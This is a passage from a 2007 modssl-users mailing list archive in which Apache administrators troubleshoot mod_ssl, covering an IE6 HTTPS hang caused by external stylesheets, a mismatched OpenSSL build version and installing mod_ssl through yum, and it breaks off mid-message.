	by smtp1.dnsmadeeasy.com (Postfix) with ESMTP id B61DA2C0002
	for ; Thu,  7 Jun 2007 21:35:26 +0000 (GMT)
X-Authenticated-Name: beileysoftware
X-Transit-System: In case of SPAM please contact abuse@dnsmadeeasy.com
Received: from MarkE1505 (0-1pool140-55.nas5.tempe1.az.us.da.qwest.net [67.3.140.55])
	by smtp1.dnsmadeeasy.com (Postfix) with ESMTP
	for ; Thu,  7 Jun 2007 21:35:26 +0000 (GMT)
Message-ID: <548AB84654B543B1B2499B3F2C8686F8@MarkE1505>
From: "Mark Beiley" 
To: 
References:  <466802CF.2020407@aeccom.com>
In-Reply-To: <466802CF.2020407@aeccom.com>
Subject: Re: Apache 2.0 + mod_ssl problems with IE6 on XP (no SP2)
Date: Thu, 7 Jun 2007 14:35:23 -0700
Organization: Beiley Software
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Windows Mail 6.0.6000.16386
X-MimeOLE: Produced By Microsoft MimeOLE V6.0.6000.16386
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mark Beiley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Sven,

Thanks for the reply.  I believe I have KeepAlive off for this browser.
In my ssl.conf file I have:

SetEnvIf User-Agent ".*MSIE.*" \
         nokeepalive ssl-unclean-shutdown \
         downgrade-1.0 force-response-1.0

Thanks,
Mark
http://www.beiley.com



> Hi Mark,
>
> Do you have KeepALive on in you server config for this browser?
>
> Sven.
>
>
> Mark Beiley schrieb:
>> Hello,
>>
>> Several customers are not able to access my server via HTTPS.  Their
>> browser
>> just sits there, and doesn't display anything.  I've determined the 
>> common
>> properties of these cases to be:
>>
>> Windows XP (all of them without SP2)
>> Internet Explorer 6
>>
>> I can see their requests show up fine in my log files, without errors.
>> These customers can visit other HTTPS sites.  My site works fine for the
>> vast majority of people.  I'm stumped on the next step to try and debug
>> the problem.  Any suggestions?
>>
>> My server configuration:
>> Apache 2.0.54 with mod_ssl and mod_deflate, running on Windows XP
>>
>> For an example URL, try: https://www.beileysoftware.com/handy.html
>>
>> Thanks,
>> Mark
>> http://www.beiley.com 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  8 00:16:57 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 6AF4914D887; Fri,  8 Jun 2007 00:16:57 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from ftmta02.osb.ft.com (ftmta02.ft.com [145.246.241.48])
	by master.modssl.org (Postfix) with ESMTP id 0D56714D83E;
	Fri,  8 Jun 2007 00:16:51 +0200 (CEST)
Subject: Re: OpenSSL verion from mod_ssl statically compiled into httpd?
To: modssl-users@modssl.org
Cc: modssl-users@modssl.org,
	owner-modssl-users@modssl.org
X-Mailer: Lotus Notes Release 5.0.11   July 24, 2002
Message-ID: 
From: Vishal.Bhalla@FT.com
Date: Thu, 7 Jun 2007 16:11:22 +0100
X-MIMETrack: Serialize by Router on FTMTA02/FTINTERNETMAIL(Release 6.5|September 26, 2003) at
 07/06/2007 23:14:42
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Vishal.Bhalla@FT.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users





Hi guys,

Is there a definitive way of finding out the version of OpenSSL used by
httpd, with mod_ssl statically compiled into it.

Thanks!



|---------+----------------------------->
|         |           Vishal.Bhalla@FT.c|
|         |           om                |
|         |           Sent by:          |
|         |           owner-modssl-users|
|         |           @modssl.org       |
|         |                             |
|         |                             |
|         |           07/06/2007 13:59  |
|         |           Please respond to |
|         |           modssl-users      |
|         |                             |
|---------+----------------------------->
  >------------------------------------------------------------------------------------------------------------------------------|
  |<                                                                                                                             |
  |       To:       modssl-users@modssl.org<                                                                                     |
  |       cc:       modssl-users@modssl.org, owner-modssl-users@modssl.org                                                       |
  |       Subject:  Re: OpenSSL verion from mod_ssl statically compiled into httpd?                                              |
  >------------------------------------------------------------------------------------------------------------------------------|








Thanks for the reply Zareh, but still no joy :-(

We DO have old libraries on the box, but when compiling apache (after
setting SSL_BASE),
The output does show:
.
.
      + SSL library version: OpenSSL 0.9.8e 23 Feb 2007
.
.
Running a strings on httpd shows:

OpenSSL 0.9.7b 10 Apr 2003
SSLv2 part of OpenSSL 0.9.8e 23 Feb 2007
TLSv1 part of OpenSSL 0.9.8e 23 Feb 2007
OpenSSL 0.9.8e 23 Feb 2007
SSLv3 part of OpenSSL 0.9.8e 23 Feb 2007
Big Number part of OpenSSL 0.9.8e 23 Feb 2007
RSA part of OpenSSL 0.9.8e 23 Feb 2007
Diffie-Hellman part of OpenSSL 0.9.8e 23 Feb 2007
Stack part of OpenSSL 0.9.8e 23 Feb 2007
lhash part of OpenSSL 0.9.8e 23 Feb 2007
EVP part of OpenSSL 0.9.8e 23 Feb 2007
ASN.1 part of OpenSSL 0.9.8e 23 Feb 2007
X.509 part of OpenSSL 0.9.8e 23 Feb 2007
MD2 part of OpenSSL 0.9.8e 23 Feb 2007
MD5 part of OpenSSL 0.9.8e 23 Feb 2007
SHA1 part of OpenSSL 0.9.8e 23 Feb 2007
SHA-256 part of OpenSSL 0.9.8e 23 Feb 2007
SHA-512 part of OpenSSL 0.9.8e 23 Feb 2007
DES part of OpenSSL 0.9.8e 23 Feb 2007
libdes part of OpenSSL 0.9.8e 23 Feb 2007
RC2 part of OpenSSL 0.9.8e 23 Feb 2007
RC4 part of OpenSSL 0.9.8e 23 Feb 2007
IDEA part of OpenSSL 0.9.8e 23 Feb 2007
DSA part of OpenSSL 0.9.8e 23 Feb 2007
ECDSA part of OpenSSL 0.9.8e 23 Feb 2007
ECDH part of OpenSSL 0.9.8e 23 Feb 2007
RAND part of OpenSSL 0.9.8e 23 Feb 2007
PEM part of OpenSSL 0.9.8e 23 Feb 2007
CONF part of OpenSSL 0.9.8e 23 Feb 2007
CONF_def part of OpenSSL 0.9.8e 23 Feb 2007

As you can see from the top line, 0.9.7b is comming in from somewhere!?#@!

Question, is the output of this LogFormat line an accurate reflection of
what version of openssl was compiled into httpd?:

   CustomLog /tmp/ssl.log "%{SSL_VERSION_LIBRARY}x
%{SSL_VERSION_INTERFACE}x"

I'll try and move those libs out of the way, and re-compile



|---------+----------------------------->
|         |           Zareh             |
|         |                            |
|         |           Sent by:          |
|         |           owner-modssl-users|
|         |           @modssl.org       |
|         |                             |
|         |                             |
|         |           06/06/2007 06:10  |
|         |           Please respond to |
|         |           modssl-users      |
|         |                             |
|---------+----------------------------->

>------------------------------------------------------------------------------------------------------------------------------|

  |<
|
  |       To:       modssl-users@modssl.org<
|
  |       cc:
|
  |       Subject:  Re: OpenSSL verion from mod_ssl statically compiled
into httpd?                                              |

>------------------------------------------------------------------------------------------------------------------------------|





Hi Vishal,

I seem to remember running into this a while back, it turned out that I had
old ssl libs in /usr/local/ssl and apache's build scripts were picking them
up. instead of /usr/local/openssl - I can't remember what I did to get them
to compile with the newer openssl libs, but here are a few things you could
try:

1) Set the following in your environment before you build apache/mod_ssl

SSL_BASE=/usr/local/openssl  (wherever the libs are you want to compile
against)
export SSL_BASE

2) Find the libs ( find /usr/* -type f -name '*ssl*' ), tar them up and
move them into another directory. Build apache/mod_ssl - then just untar
the old libs back into place.
... kinda messy though :)

----- Original Message ----
From: "Vishal.Bhalla@FT.com" 
To: modssl-users@modssl.org
Sent: Monday, June 4, 2007 8:52:34 AM
Subject: OpenSSL verion from mod_ssl statically compiled into httpd?





Question: How do I find out the version of openssl used by my httpd that
has mod_ssl statically compiled into it?

"HEAD / HTTP/1.0" shows no mod_ssl info, and the only way in which I can
get anything is to use the following in the Apache conf:

CustomLog /tmp/ssl.log "%{SSL_VERSION_LIBRARY}x %{SSL_VERSION_INTERFACE}x"

Is this accurate, and can it be trusted? I ask because I recompiled
apache/mod_ssl using openssl 0.9.8c and the version the above showed in the
logs was older: 0.9.7b, which isn't installed on the box...?

My LD_LIBRARY path was set to /usr/local/ssl/lib, which contained:

engines/
libcrypto.a
libcrypto.so
libcrypto.so.0.9.8*
libssl.a
libssl.so
libssl.so.0.9.8*
pkgconfig/

It's an old setup that I've inherited from people who have all left now :-(
The source files and the way in which this was compiled have gone.

To be honest, I'm a bit confused as to the whole ssl setup with regards to
solaris <-->apache <--> mod_ssl. I download and compiled openssl 0.9.8e
from source and compiled mod_ssl with ./configure
--with-apache=../apache_1.3.37 --with-ssl=../openssl-0.9.8e

But when apache built, it said that it was using 0.9.8c the one installed
as a pkg on the solaris box. Why would it do that? Anyway, the custom log
shows
the correct mod_ssl version, but an old openssl version.

Any help is much appreciated, thanks in advance guys.

Regards,
Vish.
**********************************************************************************


This email may contain confidential material.  If you were not an intended
recipient, please notify the sender and delete all copies.  We may monitor
email to and from our network. For more details see www.FT.com.

The Financial Times Limited, registered in England and Wales number 227590.
Registered office: Number One Southwark Bridge, London SE1 9HL.  VAT number
GB 278 5371 21.

F.T. Publications Inc, incorporated in New York, number 13-2545828,
Registered office: 1330 Avenue of the Americas, New York NY 10019, USA.

The Financial Times (HK) Limited, registered in Hong Kong number 108204,
Registered office: Suite 2903-2909, level 29, 2 International Finance
Centre, No.8 Finance Street, Central, Hong Kong.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org






____________________________________________________________________________________


Moody friends. Drama queens. Your life? Nope! - their life, your story.
Play Sims Stories at Yahoo! Games.
http://sims.yahoo.com/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org




**********************************************************************************

This email may contain confidential material. If you were not an
intended recipient, please notify the sender and delete all copies.
We may monitor email to and from our network.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org




**********************************************************************************
This email may contain confidential material. If you were not an
intended recipient, please notify the sender and delete all copies.
We may monitor email to and from our network.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  8 08:31:36 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7647814D86B; Fri,  8 Jun 2007 08:31:36 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mail.aeccom.com (port-83-236-156-30.static.qsc.de [83.236.156.30])
	by master.modssl.org (Postfix) with ESMTP id F368814D83E
	for ; Fri,  8 Jun 2007 08:31:35 +0200 (CEST)
Received: from localhost (localhost.localdomain [127.0.0.1])
	by mail.aeccom.com (Postfix) with ESMTP id 9A9451D085
	for ; Fri,  8 Jun 2007 08:30:44 +0200 (CEST)
Received: from mail.aeccom.com ([127.0.0.1])
 by localhost (gate6.aeccom.com [127.0.0.1]) (amavisd-new, port 10024)
 with LMTP id 20902-01-13 for ;
 Fri,  8 Jun 2007 08:30:43 +0200 (CEST)
Received: from [192.168.2.140] (andes.core.aeccom.com [192.168.2.140])
	by mail.aeccom.com (Postfix) with ESMTP id 7F1D31CEF2
	for ; Fri,  8 Jun 2007 08:30:43 +0200 (CEST)
Message-ID: <4668F791.5040605@aeccom.com>
Date: Fri, 08 Jun 2007 08:30:41 +0200
From: Sven Geisler 
Organization: AEC/communications GmbH
User-Agent: Thunderbird 2.0.0.0 (Windows/20070326)
MIME-Version: 1.0
To:  modssl-users@modssl.org
Subject: Re: Apache 2.0 + mod_ssl problems with IE6 on XP (no SP2)
References:  <466802CF.2020407@aeccom.com> <548AB84654B543B1B2499B3F2C8686F8@MarkE1505>
In-Reply-To: <548AB84654B543B1B2499B3F2C8686F8@MarkE1505>
X-Enigmail-Version: 0.95.0
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
X-Virus-Scanned: amavisd-new at aeccom.com
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Sven Geisler 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Mark,

Did you try Google ?
I guess, the root certificate causes the trouble.

Sven.

Mark Beiley schrieb:
> Hi Sven,
> 
> Thanks for the reply.  I believe I have KeepAlive off for this browser.
> In my ssl.conf file I have:
> 
> SetEnvIf User-Agent ".*MSIE.*" \
>         nokeepalive ssl-unclean-shutdown \
>         downgrade-1.0 force-response-1.0
> 
> Thanks,
> Mark
> http://www.beiley.com
> 
> 
> 
>> Hi Mark,
>>
>> Do you have KeepALive on in you server config for this browser?
>>
>> Sven.
>>
>>
>> Mark Beiley schrieb:
>>> Hello,
>>>
>>> Several customers are not able to access my server via HTTPS.  Their
>>> browser
>>> just sits there, and doesn't display anything.  I've determined the
>>> common
>>> properties of these cases to be:
>>>
>>> Windows XP (all of them without SP2)
>>> Internet Explorer 6
>>>
>>> I can see their requests show up fine in my log files, without errors.
>>> These customers can visit other HTTPS sites.  My site works fine for the
>>> vast majority of people.  I'm stumped on the next step to try and debug
>>> the problem.  Any suggestions?
>>>
>>> My server configuration:
>>> Apache 2.0.54 with mod_ssl and mod_deflate, running on Windows XP
>>>
>>> For an example URL, try: https://www.beileysoftware.com/handy.html
>>>
>>> Thanks,
>>> Mark
>>> http://www.beiley.com 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org

-- 
Sven Geisler    Tel +49.30.921017.81  Fax .50
Senior Developer, AEC/communications GmbH & Co. KG Berlin, Germany
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jun  8 18:14:05 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 529CC14D884; Fri,  8 Jun 2007 18:14:05 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.dnsmadeeasy.com (smtp1.dnsmadeeasy.com [205.234.170.134])
	by master.modssl.org (Postfix) with ESMTP id 52F0714D83E
	for ; Fri,  8 Jun 2007 18:14:03 +0200 (CEST)
Received: from smtp1.dnsmadeeasy.com (localhost [127.0.0.1])
	by smtp1.dnsmadeeasy.com (Postfix) with ESMTP id E54C82C28D5
	for ; Fri,  8 Jun 2007 16:13:09 +0000 (GMT)
X-Authenticated-Name: beileysoftware
X-Transit-System: In case of SPAM please contact abuse@dnsmadeeasy.com
Received: from MarkE1505 (0-2pool131-10.nas5.tempe1.az.us.da.qwest.net [67.3.131.10])
	by smtp1.dnsmadeeasy.com (Postfix) with ESMTP
	for ; Fri,  8 Jun 2007 16:13:09 +0000 (GMT)
Message-ID: <9C07DE26D62E4E61814016F13D52076D@MarkE1505>
From: "Mark Beiley" 
To: 
References:  <466802CF.2020407@aeccom.com> <548AB84654B543B1B2499B3F2C8686F8@MarkE1505> <4668F791.5040605@aeccom.com>
In-Reply-To: <4668F791.5040605@aeccom.com>
Subject: Re: Apache 2.0 + mod_ssl problems with IE6 on XP (no SP2)
Date: Fri, 8 Jun 2007 09:13:07 -0700
Organization: Beiley Software
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Windows Mail 6.0.6000.16386
X-MimeOLE: Produced By Microsoft MimeOLE V6.0.6000.16386
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mark Beiley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Sven,

Interesting...  I hadn't thought of that.  I know some other
sites using a Starfield certificate.  I'll see if these
customers experience the same problem when they go there.

Thanks for your help!

Mark
http://www.beiley.com


----- Original Message ----- 
From: "Sven Geisler" 
To: 
Sent: Thursday, June 07, 2007 11:30 PM
Subject: Re: Apache 2.0 + mod_ssl problems with IE6 on XP (no SP2)


> Hi Mark,
>
> Did you try Google ?
> I guess, the root certificate causes the trouble.
>
> Sven.
>
> Mark Beiley schrieb:
>> Hi Sven,
>>
>> Thanks for the reply.  I believe I have KeepAlive off for this browser.
>> In my ssl.conf file I have:
>>
>> SetEnvIf User-Agent ".*MSIE.*" \
>>         nokeepalive ssl-unclean-shutdown \
>>         downgrade-1.0 force-response-1.0
>>
>> Thanks,
>> Mark
>> http://www.beiley.com
>>
>>
>>
>>> Hi Mark,
>>>
>>> Do you have KeepALive on in you server config for this browser?
>>>
>>> Sven.
>>>
>>>
>>> Mark Beiley schrieb:
>>>> Hello,
>>>>
>>>> Several customers are not able to access my server via HTTPS.  Their
>>>> browser
>>>> just sits there, and doesn't display anything.  I've determined the
>>>> common
>>>> properties of these cases to be:
>>>>
>>>> Windows XP (all of them without SP2)
>>>> Internet Explorer 6
>>>>
>>>> I can see their requests show up fine in my log files, without errors.
>>>> These customers can visit other HTTPS sites.  My site works fine for 
>>>> the
>>>> vast majority of people.  I'm stumped on the next step to try and debug
>>>> the problem.  Any suggestions?
>>>>
>>>> My server configuration:
>>>> Apache 2.0.54 with mod_ssl and mod_deflate, running on Windows XP
>>>>
>>>> For an example URL, try: https://www.beileysoftware.com/handy.html
>>>>
>>>> Thanks,
>>>> Mark
>>>> http://www.beiley.com
>>
>> ______________________________________________________________________
>> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>> User Support Mailing List                      modssl-users@modssl.org
>> Automated List Manager                            majordomo@modssl.org
>
> -- 
> Sven Geisler    Tel +49.30.921017.81  Fax .50
> Senior Developer, AEC/communications GmbH & Co. KG Berlin, Germany
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jun 11 22:12:00 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id E02A814D87D; Mon, 11 Jun 2007 22:11:59 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from smtp1.dnsmadeeasy.com (smtp1.dnsmadeeasy.com [205.234.170.134])
	by master.modssl.org (Postfix) with ESMTP id 4299214D82E
	for ; Mon, 11 Jun 2007 22:11:58 +0200 (CEST)
Received: from smtp1.dnsmadeeasy.com (localhost [127.0.0.1])
	by smtp1.dnsmadeeasy.com (Postfix) with ESMTP id 5F84B2C5B0F
	for ; Mon, 11 Jun 2007 20:11:05 +0000 (GMT)
X-Authenticated-Name: beileysoftware
X-Transit-System: In case of SPAM please contact abuse@dnsmadeeasy.com
Received: from MarkE1505 (mail.handyaddressbook.com [209.181.98.231])
	by smtp1.dnsmadeeasy.com (Postfix) with ESMTP
	for ; Mon, 11 Jun 2007 20:11:05 +0000 (GMT)
Message-ID: <9A1B5237A0904F92848CD1A919D1C616@MarkE1505>
From: "Mark Beiley" 
To: 
References:  <466802CF.2020407@aeccom.com> <548AB84654B543B1B2499B3F2C8686F8@MarkE1505> <4668F791.5040605@aeccom.com>
In-Reply-To: <4668F791.5040605@aeccom.com>
Subject: Re: Apache 2.0 + mod_ssl problems with IE6 on XP (no SP2)
Date: Mon, 11 Jun 2007 13:11:04 -0700
Organization: Beiley Software
MIME-Version: 1.0
Content-Type: text/plain;
	format=flowed;
	charset="iso-8859-1";
	reply-type=original
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Windows Mail 6.0.6000.16386
X-MimeOLE: Produced By Microsoft MimeOLE V6.0.6000.16386
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Mark Beiley" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I've learned that I can fix this problem by not using an external style 
sheet.
This only affects IE6 on XP without SP2.  Everyone else seems to be able
to view my pages fine, and even these problematic IE6/XP customers can view
pages with external style sheets that are not using HTTPS.

Specifically, if I delete this line from my HTML:



then these problematic browsers can view the page fine.

I've also changed the HTML to include the exact contents of the style sheet 
inline, and this works
fine.  It is only when the style sheet is external that the browser can't 
display the contents.
If I leave the external style sheet in place, I can see in the logs the 
browser requesting
the page and then the style sheet.  Both are returned with no errors, but 
the browser
just sits there with a blank page, and never really finishes.  It seems like 
it is
waiting for something to complete, but it never finishes.

I'm guessing this was some bug in early versions of IE6, but does anyone 
know what the
specific problem is, and how I can fix it by configuring Apache differently?

Thanks,
Mark
http://www.beiley.com


>>>> Hello,
>>>>
>>>> Several customers are not able to access my server via HTTPS.  Their
>>>> browser
>>>> just sits there, and doesn't display anything.  I've determined the
>>>> common
>>>> properties of these cases to be:
>>>>
>>>> Windows XP (all of them without SP2)
>>>> Internet Explorer 6
>>>>
>>>> I can see their requests show up fine in my log files, without errors.
>>>> These customers can visit other HTTPS sites.  My site works fine for 
>>>> the
>>>> vast majority of people.  I'm stumped on the next step to try and debug
>>>> the problem.  Any suggestions?
>>>>
>>>> My server configuration:
>>>> Apache 2.0.54 with mod_ssl and mod_deflate, running on Windows XP
>>>>
>>>> For an example URL, try: https://www.beileysoftware.com/handy.html
>>>>
>>>> Thanks,
>>>> Mark
>>>> http://www.beiley.com 

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 12 19:18:54 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id DB1C414D856; Tue, 12 Jun 2007 19:18:54 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from wx-out-0506.google.com (wx-out-0506.google.com [66.249.82.239])
	by master.modssl.org (Postfix) with ESMTP id 34B5F14D83E
	for ; Tue, 12 Jun 2007 19:18:53 +0200 (CEST)
Received: by wx-out-0506.google.com with SMTP id h29so1615480wxd
        for ; Tue, 12 Jun 2007 10:18:00 -0700 (PDT)
DKIM-Signature: a=rsa-sha1; c=relaxed/relaxed;
        d=gmail.com; s=beta;
        h=domainkey-signature:received:received:message-id:date:from:to:subject:mime-version:content-type;
        b=omr5rUgLBE+58GqHaohkHHeJxraDmwu5VBXtzCKn0ds+31V1WK8qeJNT8uA5gxJdUabukN/HxZsn9tGPj5C6p939kLeY0fMcJWUuIhXydjoINEwt4AnvlMEcvJNBzFZ8i6RZmTTb+vJHsfc+uVDeRKuKNKuyPUg4hy8nOeWS0Cc=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=beta;
        h=received:message-id:date:from:to:subject:mime-version:content-type;
        b=d8AZ0HhBHMxvoemu4gqndqbGu0p2/7uJGY9XsgTYKLSz1RxZDlQ//wxBxbd0AbiJp8WC2o9naOKxmSb2oiJeKYjbtJx3smXxvIVURKADdlmCwzPBFtbOQZgZfD285ISWNJdaG5RzW4JlnmwCDuTYKbqchqXq2iHIjCuiwJbz9m8=
Received: by 10.90.68.15 with SMTP id q15mr6812090aga.1181668680202;
        Tue, 12 Jun 2007 10:18:00 -0700 (PDT)
Received: by 10.90.94.11 with HTTP; Tue, 12 Jun 2007 10:18:00 -0700 (PDT)
Message-ID: <81c76d150706121018n3e877d49u720dff6b15bfaefe@mail.gmail.com>
Date: Tue, 12 Jun 2007 12:18:00 -0500
From: "Lalit Kapoor" 
To: modssl-users@modssl.org
Subject: adding mod_ssl module to existing apache configuration
MIME-Version: 1.0
Content-Type: multipart/alternative; 
	boundary="----=_Part_6683_13209942.1181668680182"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Lalit Kapoor" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

------=_Part_6683_13209942.1181668680182
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi,

I am using following version of apache, i got it installed using " yum
install httpd ".

Server version: Apache/2.0.52
Server built:   Aug  2 2006 05:21:10

There is a requirement of adding mod_ssl module to existing apache
configuration.

Can you give me some idea if it possible to add mod_ssl in running
configuration or do i need to recompile and install apache with mod_ssl.

Thanks,
Lalit

------=_Part_6683_13209942.1181668680182
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Content-Disposition: inline

Hi,

I am using following version of apache, i got it installed using " yum install httpd ".

Server version: Apache/2.0.52
Server built:   Aug  2 2006 05:21:10

There is a requirement of adding mod_ssl module to existing apache configuration.


Can you give me some idea if it possible to add mod_ssl in running configuration or do i need to recompile and install apache with mod_ssl.

Thanks,
Lalit 





------=_Part_6683_13209942.1181668680182--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 12 19:36:02 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 85EA914D856; Tue, 12 Jun 2007 19:36:02 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from mower.iserver.net (mower.iserver.net [128.121.79.16])
	by master.modssl.org (Postfix) with ESMTP id B061514D83E
	for ; Tue, 12 Jun 2007 19:36:01 +0200 (CEST)
Received: from gromit.corp.verio.net (fw.oremut02.us.wh.verio.net [198.65.168.24])
	(authenticated bits=0)
	by mower.iserver.net (8.13.6.20060614/8.13.6) with ESMTP id l5CHZ5uQ029211
	for ; Tue, 12 Jun 2007 11:35:05 -0600 (MDT)
Message-ID: <466ED943.4040202@allez-oop.net>
Date: Tue, 12 Jun 2007 11:34:59 -0600
From: "Omar W. Hannet" 
User-Agent: Thunderbird 2.0.0.0 (X11/20070514)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: adding mod_ssl module to existing apache configuration
References: <81c76d150706121018n3e877d49u720dff6b15bfaefe@mail.gmail.com>
In-Reply-To: <81c76d150706121018n3e877d49u720dff6b15bfaefe@mail.gmail.com>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Omar W. Hannet" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Lalit Kapoor wrote:

> Can you give me some idea if it possible to add mod_ssl in running 
> configuration or do i need to recompile and install apache with mod_ssl.

Have you tried 'yum install mod_ssl'?

-- 
Omar W. Hannet
http://www.allez-oop.net/
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 12 23:14:23 2007
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D12FE14D856; Tue, 12 Jun 2007 23:14:23 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from v200.vormetric.com (v200.vormetric.com [12.104.149.104])
	by master.modssl.org (Postfix) with ESMTP id C8DB914D83E
	for ; Tue, 12 Jun 2007 23:14:22 +0200 (CEST)
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C7AD36.85840E23"
Subject: mod_ssl setup process with apache 2.2.4
Date: Tue, 12 Jun 2007 14:13:28 -0700
Message-ID: <3901F85E21D7EE44AC427250A221A53B064BC370@vegas.vormetric.com>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: mod_ssl setup process with apache 2.2.4
Thread-Index: AcetNoV9FJcIiar8Rh+616Gf1OFInA==
From: "Saikat Saha" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Saikat Saha" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C7AD36.85840E23
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi,

=20

We are trying to setup apache 2.2.4 alongwith mod_ssl and mod_jk. Mod_jk
